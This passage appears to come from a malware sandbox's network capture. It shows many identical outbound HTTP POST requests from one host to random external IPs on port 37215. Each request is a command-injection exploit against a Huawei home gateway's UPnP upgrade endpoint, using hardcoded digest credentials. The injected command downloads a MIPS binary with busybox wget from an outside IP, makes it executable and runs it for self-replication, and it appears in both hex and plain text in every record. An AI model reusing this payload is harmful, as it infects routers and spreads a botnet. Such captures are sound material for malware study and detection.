                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1122192.168.2.156075041.34.116.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735228062 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1123192.168.2.1554364197.86.159.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735266924 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1124192.168.2.155737841.163.164.2237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735522032 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1125192.168.2.153351291.254.134.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735578060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1126192.168.2.154864676.216.147.3837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735646963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1127192.168.2.1555686180.82.163.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.735671997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1128192.168.2.154408841.223.42.21037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736073017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1129192.168.2.1546916170.60.78.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736140013 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1130192.168.2.1549492197.119.139.1037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736148119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1131192.168.2.155875241.246.83.18037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:59.736309052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 